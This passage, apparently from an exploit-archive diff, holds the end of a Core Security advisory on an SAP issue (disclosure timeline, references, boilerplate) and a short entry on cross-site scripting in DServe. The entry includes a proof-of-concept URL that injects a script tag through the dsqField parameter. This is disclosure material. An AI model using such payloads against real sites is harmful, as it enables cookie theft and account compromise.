the release of a fix.
. 2014-07-14:
The vendor informs they were able to reproduce the issue but
they will not be able to provide
a timeline for the fix at the time. They inform they will work
with high priority on it and
will inform us of the planned fix release date.
. 2014-08-12:
Core Security asks if the vendor was able to develop a fix and
if they have a possible timeline
for its availability.
. 2014-08-13:
The vendor informs that the fix is undergoing quality checks.
They also inform that they can't
provide an exact date of publication yet. They also request a 3
months grace period once the
patch is available.
. 2014-08-13:
Core Security informs SAP that after we get notice that the fix
is available to the public we will
publish the advisory accordingly and will not wait for the 3
months of grace as requested because
that's not our proceeding policy.
. 2014-08-18:
The vendor informs that the fix is going to be released with the
October patch day, on Tuesday the
14th, of 2014.
. 2014-10-14:
The vendor publishes the fix under the security note 2042845.
. 2014-10-15:
Core Security releases the advisory.
9. **References**
[1] http://www.sap.com/platform/netweaver/index.epx.
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.
10. **About CoreLabs**
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer
security
including system vulnerabilities, cyber attack planning and
simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel
solutions and
prototypes for new technologies. CoreLabs regularly publishes
security
advisories, technical papers, project information and shared
software
tools for public use at: http://corelabs.coresecurity.com.
11. **About Core Security**
Core Security enables organizations to get ahead of threats with
security
test and measurement solutions that continuously identify and
demonstrate
real-world exposures to their most critical assets. Our
customers can
gain real visibility into their security standing, real
validation of
their security controls, and real metrics to more effectively
secure their
organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's
Security
Consulting Services, CoreLabs and Engineering groups. Core Security
can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
12. **Disclaimer**
The contents of this advisory are copyright (c) 2014 Core
Security and (c) 2014 CoreLabs, and
are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. **PGP/GPG Keys**
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

7
platforms/windows/remote/34997.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44881/info
DServe is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/DServe/dserve.exe?&amp;amp;dsqIni=Dserve.ini&amp;amp;dsqApp=Archive&amp;amp;dsqCmd=OverSort.tcl&amp;amp;dsqDb=Catalog&amp;amp;dsqField=&lt;script&gt;alert(1)&lt;/script&gt;&amp;amp;dsqSearch=*&amp;amp;dsqNum=10